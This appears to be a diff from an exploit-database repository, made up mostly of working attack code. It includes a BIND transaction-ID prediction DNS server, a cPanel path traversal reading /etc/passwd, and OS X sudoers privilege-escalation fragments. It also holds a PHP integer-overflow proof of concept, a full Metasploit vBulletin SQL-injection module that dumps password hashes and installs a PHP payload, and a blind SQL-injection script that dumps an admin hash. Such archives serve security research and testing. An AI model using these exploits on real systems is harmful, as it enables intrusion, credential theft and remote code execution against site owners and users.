self.tap1=0xc000002b # (0x80000057>>1)|(1<<31)
self.tap2=0xc0000061 # (0x800000c2>>1)|(1<<31)
self.next = self.run()
return
def run(self):
if (self.txid & 1) != 0:
#print "info: LSB is not 0. Can't predict the next transaction ID."
return False
#print "info: LSB is 0, predicting..."
# One bit shift (assuming the two lsb's are 0 and 0)
for msb in xrange(0, 2):
self.cand.append(((msb<<15)|(self.txid>>1)) & 0xFFFF)
# Two bit shift (assuming the two lsb's are 1 and 1)
# First shift (we know the lsb is 1 in both LFSRs):
v=self.txid
v=(v>>1)^self.tap1^self.tap2
if (v & 1) == 0:
# After the first shift, the lsb becomes 0, so the two LFSRs now have
# identical lsb's: 0 and 0 or 1 and 1
# Second shift:
v1=(v>>1) # 0 and 0
v2=(v>>1)^self.tap1^self.tap2 # 1 and 1
else:
# After the first shift, the lsb becomes 1, so the two LFSRs now have
# different lsb's: 1 and 0 or 0 and 1
# Second shift:
v1=(v>>1)^self.tap1 # 1 and 0
v2=(v>>1)^self.tap2 # 0 and 1
# Also need to enumerate over the 2 msb's we are clueless about
for msbits in xrange(0, 4):
self.cand.append(((msbits<<14)|v1) & 0xFFFF)
self.cand.append(((msbits<<14)|v2) & 0xFFFF)
return True;
class DNSData:
def __init__(self, data):
self.data=data
self.name=''
for i in xrange(12, len(data)):
self.name+=data[i]
if data[i] == '\x00':
break
q_type = unpack(">H", data[i+1:i+3])[0]
if q_type != 1: # only type: A (host address) allowed.
self.name = None
return
def response(self, ip=None):
packet=''
packet+=self.data[0:2] # id
packet+="\x84\x10" # flags
packet+="\x00\x01" # questions
packet+="\x00\x01" # answer RRS
packet+="\x00\x00" # authority RRS
packet+="\x00\x00" # additional RRS
packet+=self.name # queries: name
packet+="\x00\x01" # queries: type (A)
packet+="\x00\x01" # queries: class (IN)
packet+="\xc0\x0c" # answers: name
if ip == None:
packet+="\x00\x05" # answers: type (CNAME)
packet+="\x00\x01" # answers: class (IN)
packet+="\x00\x00\x00\x01" # answers: time to live (1sec)
packet+=pack(">H", len(self.name)+2) # answers: data length
packet+="\x01" + "x" + self.name # answers: primary name
else:
packet+="\x00\x01" # answers: type (A)
packet+="\x00\x01" # answers: class (IN)
packet+="\x00\x00\x00\x01" # answers: time to live (1sec)
packet+="\x00\x04" # answers: data length
packet+=str.join('',map(lambda x: chr(int(x)), ip.split('.'))) # IP
#packet+="\x00\x00\x29\x10\x00\x00\x00\x00\x00\x00\x00" # Additional
return packet
class DNSServer:
def __init__(self):
self.is_r = []
self.is_w = []
self.is_e = []
self.targets = []
self.named_conf = []
for i in xrange(len(_NAMED_CONF)):
start = 0
tmp = ''
for j in xrange(len(_NAMED_CONF[i][0])):
if _NAMED_CONF[i][0][j] == '.':
tmp += chr(j - start)
tmp += _NAMED_CONF[i][0][start:j]
start = j + 1
tmp += chr(j - start + 1)
tmp += _NAMED_CONF[i][0][start:] + "\x00"
self.named_conf.append([tmp, _NAMED_CONF[i][1]])
return
def run(self):
self.s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
self.s.bind(('',53))
self.is_r.append(self.s)
next = False
i = 0
while 1:
r, w, e = select.select(self.is_r, self.is_w, self.is_e, 1.0)
if r:
try:
data, addr = self.s.recvfrom(1024)
except socket.error:
continue
txid = unpack(">H", data[0:2])[0]
p=DNSData(data)
if p.name == None:
continue
found = False
for j in xrange(len(self.named_conf)):
if p.name == self.named_conf[j][0]:
found = True
break
if found == True:
self.s.sendto(p.response(self.named_conf[j][1]), addr)
continue
# FIXME: wrong code, 'i' is 0 at begin and when 1 item in list...
for i in xrange(len(self.targets)):
if self.targets[i][0] == addr[0]:
break
if i == len(self.targets):
self.targets.append([addr[0], False, time.time(), [None, None], \
None, 0, 0, 0])
if self.targets[i][1] == False:
bsp = BINDSimplePredict(txid)
self.targets[i][1] = bsp.next
self.targets[i][3][0] = bsp.cand
bsp = BINDSimplePredict(txid, False)
self.targets[i][3][1] = bsp.cand
else:
if p.name == self.targets[i][4]:
elapsed = time.time() - self.targets[i][2]
if elapsed > _ANSWER_TIME_LIMIT:
print 'info: slow answer, discarding (%.2f sec)' % elapsed
else:
self.targets[i][5] += 1
found_v1 = False
found_v2 = False
for j in xrange(10):
if self.targets[i][3][0][j] == txid:
found_v1 = True
break
if self.targets[i][3][1][j] == txid:
found_v2 = True
break
if found_v1 == True or found_v2 == True:
self.targets[i][6] += 1
else:
self.targets[i][7] += 1
# TODO: if found_v1 or found_v2 is True, then show bind version!
print "\n" + str(i) + ' target:', self.targets
print '%f:%s:%d: id: %04x q: %d g: %d e: %d' % (time.time(), \
addr[0], addr[1], txid, self.targets[i][5], \
self.targets[i][6], self.targets[i][7])
self.targets[i][1] = False
self.targets[i][2] = time.time()
self.targets[i][4] = "\x01" + "x" + p.name
self.s.sendto(p.response(), addr)
return
def close(self):
self.s.close()
return
if __name__ == '__main__':
dns_srv = DNSServer()
try:
dns_srv.run()
except KeyboardInterrupt:
print 'ctrl-c, leaving...'
dns_srv.close()
# milw0rm.com [2007-08-07]

92
platforms/multiple/remote/9039.txt
View file

@ -1,46 +1,46 @@
+===================================================================================+
./SEC-R1Z _ __ _ _ _ _ ___ _ _ _ _ __ _ _ _ _ _
/ /_ _ _ _ / _ _\/ _ _ /\ \< |/_ _ _ _ /
\ \_ _ _ _/ /___ / / __ | |) / | | / /
\_ _ _ _/ /___ / / | __ || / | | / /
_______\ \_ _ \ \2_0_0_9 | \ | | / /____
/_ _ _ _ _\ _ _ _/\ _ _ _ / |__|\ __\ |__|/_ _ _ _ _\ R.I.P MichaelJackson !!!!!
+===================================================================================+
| |
| |
| CPANEL USER BYPASS |
| |
+===================================================================================+
| |
| Author.: Black Dream |
| Contact: Be5_at_HoTMail_dot_Fr |
| HoMe : www.sec-r1z.com |
| ARAB ETHICAL HACKING, PENETRATION TESTING & WEB APPLICATION SECURITY SYSTEM |
+===================================================================================+
| |
| Script.: CPANEL |
| Home...: http://CPANEL.NET |
| |
+-----------------------------------------------------------------------------------+
| |
| [+] Exploit: |
| |
| http://r1z.com:2082/frontend/x3/stats/lastvisit.html?domain=../../../../../../../../ etc/ passwd
| |
| |
| |
| |
| |
| [+] Now you see all cpanel[s] user[s] |
| |
| [+] Enjoy xD |
+-----------------------------------------------------------------------------------|
+===================================================================================+
| |
| Greetz.: ~ His0k4 ~ j0rd4n14n.r1z ~ SimO-s0fT ~ S4s-T3rr0rist ~ Golden-Z3r0 |
| Linux-D3v1L And All #sec-r1z memb3rz!!!! |
+===================================================================================+
E0D|F
# milw0rm.com [2009-06-29]
+===================================================================================+
./SEC-R1Z _ __ _ _ _ _ ___ _ _ _ _ __ _ _ _ _ _
/ /_ _ _ _ / _ _\/ _ _ /\ \< |/_ _ _ _ /
\ \_ _ _ _/ /___ / / __ | |) / | | / /
\_ _ _ _/ /___ / / | __ || / | | / /
_______\ \_ _ \ \2_0_0_9 | \ | | / /____
/_ _ _ _ _\ _ _ _/\ _ _ _ / |__|\ __\ |__|/_ _ _ _ _\ R.I.P MichaelJackson !!!!!
+===================================================================================+
| |
| |
| CPANEL USER BYPASS |
| |
+===================================================================================+
| |
| Author.: Black Dream |
| Contact: Be5_at_HoTMail_dot_Fr |
| HoMe : www.sec-r1z.com |
| ARAB ETHICAL HACKING, PENETRATION TESTING & WEB APPLICATION SECURITY SYSTEM |
+===================================================================================+
| |
| Script.: CPANEL |
| Home...: http://CPANEL.NET |
| |
+-----------------------------------------------------------------------------------+
| |
| [+] Exploit: |
| |
| http://r1z.com:2082/frontend/x3/stats/lastvisit.html?domain=../../../../../../../../ etc/ passwd
| |
| |
| |
| |
| |
| [+] Now you see all cpanel[s] user[s] |
| |
| [+] Enjoy xD |
+-----------------------------------------------------------------------------------|
+===================================================================================+
| |
| Greetz.: ~ His0k4 ~ j0rd4n14n.r1z ~ SimO-s0fT ~ S4s-T3rr0rist ~ Golden-Z3r0 |
| Linux-D3v1L And All #sec-r1z memb3rz!!!! |
+===================================================================================+
E0D|F
# milw0rm.com [2009-06-29]

6
platforms/osx/local/1185.pl
View file

@ -63,6 +63,6 @@ sleep(1);
print("[*] /etc/sudoers has been modified.\n");
print("[*] attempting to \"sudo sh\". (use YOUR password)\n");
system("sudo sh");
exit(0);
# milw0rm.com [2005-08-30]
exit(0);
# milw0rm.com [2005-08-30]

6
platforms/osx/local/1186.c
View file

@ -128,6 +128,6 @@ void printe(char *err,signed char e){
printf("[!] %s\n",err);
if(e)exit(e);
return;
}
// milw0rm.com [2005-08-30]
}
// milw0rm.com [2005-08-30]

6
platforms/osx/local/795.pl
View file

@ -60,6 +60,6 @@ print "\n";
system "id";
exit();
# milw0rm.com [2005-02-07]
exit();
# milw0rm.com [2005-02-07]

14
platforms/php/remote/30117.php Executable file
View file

@ -0,0 +1,14 @@
source: http://www.securityfocus.com/bid/24261/info
PHP is prone to an integer-overflow vulnerability because it fails to ensure that integer values aren't overrun. Attackers may exploit this issue to cause a buffer overflow and to corrupt process memory.
Attackers may be able to execute arbitrary machine code in the context of the affected application. Failed exploit attempts will likely result in a denial-of-service condition.
This issue affects versions prior to PHP 5.2.3.
<?
$a=str_repeat("A", 65535);
$b=1;
$c=str_repeat("A", 65535);
chunk_split($a,$b,$c);
?>

9
platforms/php/remote/30130.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/24268/info
PHP is prone to an HTTP-response-header-injection vulnerability because it fails to sanitize user-supplied input.
An attacker can exploit this issue to inject additional cookie attributes into session cookies. This may lead to other attacks.
This issue affects PHP 5.2.3 (and prior versions) and PHP 4.4.7 (and prior versions).
http://www.example.com/session.php/PHPSESSID=ID;INJECTED=ATTRIBUTE;/

458
platforms/php/remote/30212.rb Executable file
View file

@ -0,0 +1,458 @@
##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(update_info(info,
'Name' => 'vBulletin index.php/ajax/api/reputation/vote nodeid Parameter SQL Injection',
'Description' => %q{
This module exploits a SQL injection vulnerability found in vBulletin 5 that has
been used in the wild since March 2013. This module uses the sqli to extract the
web application's usernames and hashes. With the retrieved information tries to
log into the admin control panel in order to deploy the PHP payload. This module
has been tested successfully on VBulletin Version 5.0.0 Beta 13 over an Ubuntu
Linux distribution.
},
'Author' =>
[
'Orestis Kourides', # Vulnerability discovery and PoC
'juan vazquez' # Metasploit module
],
'License' => MSF_LICENSE,
'References' =>
[
[ 'CVE', '2013-3522' ],
[ 'OSVDB', '92031' ],
[ 'EDB', '24882' ],
[ 'BID', '58754' ],
[ 'URL', 'http://www.zempirians.com/archive/legion/vbulletin_5.pl.txt' ]
],
'Privileged' => false, # web server context
'Payload' =>
{
'DisableNops' => true,
'Space' => 10000 # Just value big enough to fit any php payload
},
'Platform' => 'php',
'Arch' => ARCH_PHP,
'Targets' => [[ 'vBulletin 5.0.0 Beta 11-28', { }]],
'DisclosureDate' => 'Mar 25 2013',
'DefaultTarget' => 0))
register_options(
[
OptString.new("TARGETURI", [true, 'The path to vBulletin', '/']),
OptInt.new("NODE", [false, 'Valid Node ID']),
OptInt.new("MINNODE", [true, 'Valid Node ID', 1]),
OptInt.new("MAXNODE", [true, 'Valid Node ID', 100])
], self.class)
end
def exists_node?(id)
mark = rand_text_alpha(8 + rand(5))
result = do_sqli(id, "select '#{mark}'")
if result and result =~ /#{mark}/
return true
end
return false
end
def brute_force_node
min = datastore["MINNODE"]
max = datastore["MAXNODE"]
if min > max
print_error("#{peer} - MINNODE can't be major than MAXNODE")
return nil
end
for node_id in min..max
if exists_node?(node_id)
return node_id
end
end
return nil
end
def get_node
if datastore['NODE'].nil? or datastore['NODE'] <= 0
print_status("#{peer} - Brute forcing to find a valid node id...")
return brute_force_node
end
print_status("#{peer} - Checking node id #{datastore['NODE']}...")
if exists_node?(datastore['NODE'])
return datastore['NODE']
else
return nil
end
end
def do_sqli(node, query)
mark = Rex::Text.rand_text_alpha(5 + rand(3))
random_and = Rex::Text.rand_text_numeric(4)
injection = ") and(select 1 from(select count(*),concat((select (select concat('#{mark}',cast((#{query}) as char),'#{mark}')) "
injection << "from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) "
injection << "AND (#{random_and}=#{random_and}"
res = send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(target_uri.path, "index.php", "ajax", "api", "reputation", "vote"),
'vars_post' =>
{
'nodeid' => "#{node}#{injection}",
}
})
unless res and res.code == 200 and res.body.to_s =~ /Database error in vBulletin/
return nil
end
data = ""
if res.body.to_s =~ /#{mark}(.*)#{mark}/
data = $1
end
return data
end
def get_user_data(node_id, user_id)
user = do_sqli(node_id, "select username from user limit #{user_id},#{user_id+1}")
pass = do_sqli(node_id, "select password from user limit #{user_id},#{user_id+1}")
salt = do_sqli(node_id, "select salt from user limit #{user_id},#{user_id+1}")
return [user, pass, salt]
end
def do_login(user, hash)
res = send_request_cgi({
'uri' => normalize_uri(target_uri.path, "login.php"),
'method' => 'POST',
'encode_params' => false,
'vars_get' => {
'do' => 'login'
},
'vars_post' => {
'url' => '%2Fadmincp%2F',
'securitytoken' => 'guest',
'logintype' => 'cplogin',
'do' => 'login',
'vb_login_md5password' => hash,
'vb_login_md5password_utf' => hash,
'vb_login_username' => user,
'vb_login_password' => '',
'cssprefs' => ''
}
})
if res and res.code == 200 and res.body and res.body.to_s =~ /window\.location.*admincp/ and res.headers['Set-Cookie']
session = res.get_cookies
else
return nil
end
res = send_request_cgi({
'uri' => normalize_uri(target_uri.path, "admincp", "/"),
'cookie' => session
})
if res and res.code == 200 and res.body and res.body.to_s =~ /<title>Forums Admin Control Panel<\/title>/
return session
else
return nil
end
end
def get_token(response)
token_info = {
:session_hash => "",
:security_token => "",
:admin_hash => ""
}
if response =~ /var SESSIONHASH = "([0-9a-f]+)";/
token_info[:session_hash] = $1
end
if response =~ /var ADMINHASH = "([0-9a-f]+)";/
token_info[:admin_hash] = $1
end
if response =~ /var SECURITYTOKEN = "([0-9a-f\-]+)";/
token_info[:security_token] = $1
end
return token_info
end
def get_install_token
res = send_request_cgi({
"uri" => normalize_uri(target_uri.path, "admincp", "product.php"),
"vars_get" => {
"do" => "productadd"
},
"cookie" => @session
})
unless res and res.code == 200 and res.body.to_s =~ /SECURITYTOKEN/
return nil
end
return get_token(res.body.to_s)
end
def install_product(token_info)
xml_product = <<-EOF
<?xml version="1.0" encoding="ISO-8859-1"?>
<product productid="#{@product_id}" active="0">
<title>#{@product_id}</title>
<description>#{@product_id}</description>
<version>1.0</version>
<url>http://#{@product_id}.loc</url>
<versioncheckurl>http://#{@product_id}.loc/version.xml</versioncheckurl>
<dependencies>
<dependency dependencytype="vbulletin" minversion="" maxversion="" />
</dependencies>
<codes>
<code version="*">
<installcode>
<![CDATA[
#{payload.encoded}
]]>
</installcode>
<uninstallcode />
</code>
</codes>
<templates>
</templates>
<stylevardfns>
</stylevardfns>
<stylevars>
</stylevars>
<hooks>
</hooks>
<phrases>
</phrases>
<options>
</options>
<helptopics>
</helptopics>
<cronentries>
</cronentries>
<faqentries>
</faqentries>
<widgets>
</widgets>
</product>
EOF
post_data = Rex::MIME::Message.new
post_data.add_part(token_info[:session_hash], nil, nil, "form-data; name=\"s\"")
post_data.add_part("productimport", nil, nil, "form-data; name=\"do\"")
post_data.add_part(token_info[:admin_hash], nil, nil, "form-data; name=\"adminhash\"")
post_data.add_part(token_info[:security_token], nil, nil, "form-data; name=\"securitytoken\"")
post_data.add_part(xml_product, "text/xml", nil, "form-data; name=\"productfile\"; filename=\"product_juan2.xml\"")
post_data.add_part("", nil, nil, "form-data; name=\"serverfile\"")
post_data.add_part("1", nil, nil, "form-data; name=\"allowoverwrite\"")
post_data.add_part("999999999", nil, nil, "form-data; name=\"MAX_FILE_SIZE\"")
# Work around an incompatible MIME implementation
data = post_data.to_s
data.gsub!(/\r\n\r\n--_Part/, "\r\n--_Part")
res = send_request_cgi({
'uri' => normalize_uri(target_uri.path, "admincp", "product.php"),
'method' => "POST",
'ctype' => "multipart/form-data; boundary=#{post_data.bound}",
'cookie' => @session,
'vars_get' => {
"do" => "productimport"
},
'data' => data
})
if res and res.code == 200 and res.body and res.body.to_s =~ /Product #{@product_id} Imported/
return true
elsif res
fail_with(Failure::Unknown, "#{peer} - Error when trying to install the product.")
else
return false
end
end
def get_delete_token
res = send_request_cgi({
'uri' => normalize_uri(target_uri.path, "admincp", "product.php"),
'cookie' => @session,
'vars_get' => {
"do" => "productdelete",
"productid" => @product_id,
"s" => @session_hash
}
})
if res and res.code == 200 and res.body.to_s =~ /SECURITYTOKEN/
return get_token(res.body.to_s)
end
return nil
end
def delete_product(token_info)
res = send_request_cgi({
'uri' => normalize_uri(target_uri.path, "admincp", "product.php"),
'method' => "POST",
'cookie' => @session,
'vars_get' => {
"do" => "productkill"
},
'vars_post' => {
"s" => token_info[:session_hash],
"do" => "productkill",
"adminhash" => token_info[:admin_hash],
"securitytoken" => token_info[:security_token],
"productid" => @product_id
}
})
if res and res.code == 200 and res.body.to_s =~ /Product #{@product_id} Uninstalled/
return true
end
return false
end
def check
node_id = get_node
unless node_id.nil?
return Msf::Exploit::CheckCode::Vulnerable
end
res = send_request_cgi({
'uri' => normalize_uri(target_uri.path, "index.php")
})
if res and res.code == 200 and res.body.to_s =~ /"simpleversion": "v=5/
return Msf::Exploit::CheckCode::Detected
end
return Msf::Exploit::CheckCode::Unknown
end
def on_new_session(session)
print_status("#{peer} - Getting the uninstall token info...")
delete_token = get_delete_token
if delete_token.nil?
print_error("#{peer} - Failed to get the uninstall token, the product #{@product_id} should be uninstalled manually...")
return
end
print_status("#{peer} - Deleting the product #{@product_id}...")
if delete_product(delete_token)
print_good("#{peer} - Product #{@product_id} deleted")
else
print_error("#{peer} - Failed uninstall the product #{@product_id}, should be done manually...")
end
end
def exploit
print_status("#{peer} - Checking for a valid node id...")
node_id = get_node
if node_id.nil?
print_error("#{peer} - node id not found")
return
end
print_good("#{peer} - Using node id #{node_id} to exploit sqli... Counting users...")
data = do_sqli(node_id, "select count(*) from user")
if data.empty?
print_error("#{peer} - Error exploiting sqli")
return
end
count_users = data.to_i
users = []
print_good("#{peer} - #{count_users} users found")
for i in 0..count_users - 1
user = get_user_data(node_id, i)
report_auth_info({
:host => rhost,
:port => rport,
:user => user[0],
:pass => user[1],
:type => "hash",
:sname => (ssl ? "https" : "http"),
:proof => "salt: #{user[2]}" # Using proof to store the hash salt
})
users << user
end
@session = nil
users.each do |user|
print_status("#{peer} - Trying to log into vBulletin admin control panel as #{user[0]}...")
@session = do_login(user[0], user[1])
unless @session.blank?
print_good("#{peer} - Logged in successfully as #{user[0]}")
break
end
end
if @session.blank?
fail_with(Failure::NoAccess, "#{peer} - Failed to log into the vBulletin admin control panel")
end
print_status("#{peer} - Getting the install product security token...")
install_token = get_install_token
if install_token.nil?
fail_with(Failure::Unknown, "#{peer} - Failed to get the install token")
end
@session_hash = install_token[:session_hash]
@product_id = rand_text_alpha_lower(5 + rand(8))
print_status("#{peer} - Installing the malicious product #{@product_id}...")
if install_product(install_token)
print_good("#{peer} - Product successfully installed... payload should be executed...")
else
# Two situations trigger this path:
# 1) Upload failed but there wasn't answer from the server. I don't think it's going to happen often.
# 2) New session, for exemple when using php/meterpreter/reverse_tcp, the common situation.
# Because of that fail_with isn't used here.
return
end
print_status("#{peer} - Getting the uninstall token info...")
delete_token = get_delete_token
if delete_token.nil?
print_error("#{peer} - Failed to get the uninstall token, the product #{@product_id} should be uninstalled manually...")
return
end
print_status("#{peer} - Deleting the product #{@product_id}...")
if delete_product(delete_token)
print_good("#{peer} - Product #{@product_id} deleted")
else
print_error("#{peer} - Failed uninstall the product #{@product_id}, should be done manually...")
end
end
end

1
platforms/php/webapps/10600.txt
View file

@ -1,4 +1,3 @@
#############################################################
# mypage0.4 LFI Vulnerability

2
platforms/php/webapps/12004.txt
View file

@ -21,7 +21,7 @@
<tr>
<td>
<textarea name="execcommand" cols="60" rows="3">
</textarea>
&lt;/textarea&gt;
</td>
</tr>

1
platforms/php/webapps/12563.txt
View file

@ -1,4 +1,3 @@
______ _ _ _
| ___ \ | | | | (_)
| |_/ /_____ _____ | |_ _| |_ _ ___ _ __

482
platforms/php/webapps/1319.php
View file

@ -1,241 +1,241 @@
<?php
# ---UNB153pl3_xpl.php 11.35 12/11/2005 #
# #
# Unclassified NewsBoard 1.5.3 patch level 3 "Datefrom" blind SQL #
# injection / Admin MD5 password hash dump #
# by rgod #
# site: http://rgod.altervista.org #
# #
# usage: launch from Apache, fill in requested fields, then go! #
# #
# make these changes in php.ini if you have troubles #
# with this script: #
# allow_call_time_pass_reference = on #
# register_globals = on #
# #
# Sun-tzu:"If he is taking his ease, give him no rest. If his forces are #
# united, separate them." #
error_reporting(0);
ini_set("max_execution_time",0);
ini_set("default_socket_timeout", 2);
ob_implicit_flush (1);
echo'<html><head><title> Unclassified NewsBoard 1.5.3pl3 blind SQL injection
</title><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<style type="text/css"> body {background-color:#111111; SCROLLBAR-ARROW-COLOR:
#ffffff; SCROLLBAR-BASE-COLOR: black; CURSOR: crosshair; color: #1CB081; } img
{background-color: #FFFFFF !important} input {background-color: #303030
!important} option { background-color: #303030 !important} textarea
{background-color: #303030 !important} input {color: #1CB081 !important} option
{color: #1CB081 !important} textarea {color: #1CB081 !important} checkbox
{background-color: #303030 !important} select {font-weight: normal; color:
#1CB081; background-color: #303030;} body {font-size: 8pt !important;
background-color: #111111; body * {font-size: 8pt !important} h1 {font-size:
0.8em !important} h2 {font-size: 0.8em !important} h3 {font-size: 0.8em
!important} h4,h5,h6 {font-size: 0.8em !important} h1 font {font-size: 0.8em
!important} h2 font {font-size: 0.8em !important}h3 font {font-size: 0.8em
!important} h4 font,h5 font,h6 font {font-size: 0.8em !important} * {font-style:
normal !important} *{text-decoration: none !important} a:link,a:active,a:visited
{ text-decoration: none ; color : #99aa33; } a:hover{text-decoration: underline;
color : #999933; } .Stile5 {font-family: Verdana, Arial, Helvetica, sans-serif;
font-size: 10px; } .Stile6 {font-family: Verdana, Arial, Helvetica, sans-serif;
font-weight:bold; font-style: italic;}--></style></head><body><p class="Stile6">
Unclassified NewsBoard 1.5.3pl3 blind SQL injection </p><p class="Stile6">a
script by rgod at <a href="http://rgod.altervista.org"target="_blank">
http://rgod.altervista.org</a></p><table width="84%"><tr><td width="43%"> <form
name="form1" method="post" action="'.$SERVER[PHP_SELF].'?path=value&host=
value&port=value&proxy=value"> <p> <input type="text" name="host"> <span
class="Stile5"> * hostname (ex: www.sitename.com) </span> </p> <p> <input
type="text" name="path"> <span class="Stile5"> * path ( ex: /unb/ or just / )
</span></p><p> <input type="text" name="fullpath"><span class="Stile5"> * full
path to site, need this for "INTO OUTFILE" statement (ex.: C:\\\www\\\site\\\)
</span></p><p> <input type="text" name="table_prefix"> <span class="Stile5">
specify a table prefix other than the default (unb1_)</span> </p><p><input
type="text" name="port"> <span class="Stile5">specify a port other than 80
( default value ) </span> </p> <p> <input type="text" name="proxy"> <span
class="Stile5"> send exploit through an HTTP proxy (ip:port) </span></p><p>
<input type="submit"name="Submit" value="go!"> </p> </form> </td> </tr> </table>
</body></html>';
function show($headeri)
{
$ii=0;
$ji=0;
$ki=0;
$ci=0;
echo '<table border="0"><tr>';
while ($ii <= strlen($headeri)-1)
{
$datai=dechex(ord($headeri[$ii]));
if ($ji==16) {
$ji=0;
$ci++;
echo "<td>&nbsp;&nbsp;</td>";
for ($li=0; $li<=15; $li++)
{ echo "<td>".$headeri[$li+$ki]."</td>";
}
$ki=$ki+16;
echo "</tr><tr>";
}
if (strlen($datai)==1) {echo "<td>0".$datai."</td>";} else
{echo "<td>".$datai."</td> ";}
$ii++;
$ji++;
}
for ($li=1; $li<=(16 - (strlen($headeri) % 16)+1); $li++)
{ echo "<td>&nbsp&nbsp</td>";
}
for ($li=$ci*16; $li<=strlen($headeri); $li++)
{ echo "<td>".$headeri[$li]."</td>";
}
echo "</tr></table>";
}
$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)';
function sendpacket() //if you have sockets module loaded, 2x speed! if not,load
//next function to send packets
{
global $proxy, $host, $port, $packet, $html, $proxy_regex;
$socket = socket_create(AF_INET, SOCK_STREAM, SOL_TCP);
if ($socket < 0) {
echo "socket_create() failed: reason: " . socket_strerror($socket) . "<br>";
}
else
{ $c = preg_match($proxy_regex,$proxy);
if (!$c) {echo 'Not a valid prozy...';
die;
}
echo "OK.<br>";
echo "Attempting to connect to ".$host." on port ".$port."...<br>";
if ($proxy=='')
{
$result = socket_connect($socket, $host, $port);
}
else
{
$parts =explode(':',$proxy);
echo 'Connecting to '.$parts[0].':'.$parts[1].' proxy...<br>';
$result = socket_connect($socket, $parts[0],$parts[1]);
}
if ($result < 0) {
echo "socket_connect() failed.\r\nReason: (".$result.") " . socket_strerror($result) . "<br><br>";
}
else
{
echo "OK.<br><br>";
$html= '';
socket_write($socket, $packet, strlen($packet));
echo "Reading response:<br>";
while ($out= socket_read($socket, 2048)) {$html.=$out;}
echo nl2br(htmlentities($html));
echo "Closing socket...";
socket_close($socket);
}
}
}
function sendpacketii($packet)
{
global $proxy, $host, $port, $html, $proxy_regex;
if ($proxy=='')
{$ock=fsockopen(gethostbyname($host),$port);}
else
{
$c = preg_match($proxy_regex,$proxy);
if (!$c) {echo 'Not a valid prozy...';
die;
}
$parts=explode(':',$proxy);
echo 'Connecting to '.$parts[0].':'.$parts[1].' proxy...<br>';
$ock=fsockopen($parts[0],$parts[1]);
if (!$ock) { echo 'No response from proxy...';
die;
}
}
fputs($ock,$packet);
if ($proxy=='')
{
$html='';
while (!feof($ock))
{
$html.=fgets($ock);
}
}
else
{
$html='';
while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html)))
{
$html.=fread($ock,1);
}
}
fclose($ock);
echo nl2br(htmlentities($html));
}
if (($host<>"") and ($path<>"") and ($fullpath<>""))
{
$port=intval(trim($port));
if ($port=='') {$port=80;}
if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {echo 'Error... check the path!'; die;}
if ($table_prefix=='') {$table_prefix="unb1_";}
if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;}
#STEP 1 -> Dump Admin MD5 password hash...
$SQL="9999999999) UNION SELECT ORD(SUBSTRING(Password,1,1)),ORD(SUBSTRING(Password,2,1)),ORD(SUBSTRING(Password,3,1)) FROM ".$table_prefix."users WHERE ID=1
UNION SELECT ORD(SUBSTRING(Password,4,1)),ORD(SUBSTRING(Password,5,1)),ORD(SUBSTRING(Password,6,1)) FROM ".$table_prefix."users WHERE ID=1
UNION SELECT ORD(SUBSTRING(Password,7,1)),ORD(SUBSTRING(Password,8,1)),ORD(SUBSTRING(Password,9,1)) FROM ".$table_prefix."users WHERE ID=1
UNION SELECT ORD(SUBSTRING(Password,10,1)),ORD(SUBSTRING(Password,11,1)),ORD(SUBSTRING(Password,12,1)) FROM ".$table_prefix."users WHERE ID=1
UNION SELECT ORD(SUBSTRING(Password,13,1)),ORD(SUBSTRING(Password,14,1)),ORD(SUBSTRING(Password,15,1)) FROM ".$table_prefix."users WHERE ID=1
UNION SELECT ORD(SUBSTRING(Password,16,1)),ORD(SUBSTRING(Password,17,1)),ORD(SUBSTRING(Password,18,1)) FROM ".$table_prefix."users WHERE ID=1
UNION SELECT ORD(SUBSTRING(Password,19,1)),ORD(SUBSTRING(Password,20,1)),ORD(SUBSTRING(Password,21,1)) FROM ".$table_prefix."users WHERE ID=1
UNION SELECT ORD(SUBSTRING(Password,22,1)),ORD(SUBSTRING(Password,23,1)),ORD(SUBSTRING(Password,24,1)) FROM ".$table_prefix."users WHERE ID=1
UNION SELECT ORD(SUBSTRING(Password,25,1)),ORD(SUBSTRING(Password,26,1)),ORD(SUBSTRING(Password,27,1)) FROM ".$table_prefix."users WHERE ID=1
UNION SELECT ORD(SUBSTRING(Password,28,1)),ORD(SUBSTRING(Password,29,1)),ORD(SUBSTRING(Password,30,1)) FROM ".$table_prefix."users WHERE ID=1
UNION SELECT ORD(SUBSTRING(Password,31,1)),ORD(SUBSTRING(Password,32,1)),NULL INTO OUTFILE '".$fullpath."suntzu' FROM ".$table_prefix."users WHERE ID=1/*";
$SQL=urlencode($SQL);
$packet="GET ".$p."forum.php?req=search&Query=suntzu&ResultView=2&Sort=2&DateFrom=".$SQL."&DateUntil=&Forum=0 HTTP/1.1\r\n";
$packet.="Referer: http://".$host.":".$port.$path."forum.php?req=search&unb236sess=\r\n";
$packet.="Accept-Encoding: text/plain\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Connection: Close\r\n\r\n";
show($packet);
sendpacketii($packet);
#STEP 2 -> Retrieve dump and decode...
$packet="GET ".$p."suntzu HTTP/1.1\r\n";
$packet.="Accept-Encoding: text/plain\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Connection: Close\r\n\r\n";
show($packet);
sendpacketii($packet);
if (eregi("200 OK",$html))
{
$temp=explode(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html);
$dump=$temp[1];
$temp2=''; $HASH='';
for ($i=0; $i<=strlen($dump)-1; $i++)
{
if (($dump[$i]==chr(0x09)) or ($dump[$i]==chr(0x0a)))
{$HASH.=chr($temp2); $temp2='';}
else
{$temp2.=$dump[$i]; if ($temp2=="\N") {break;} }
}
echo "<br>Exploit succeeded -> ".$HASH;
}
else
{echo "Exploit failed...";}
}
else
{echo "Fill * requested fields, optionally specify a proxy...";}
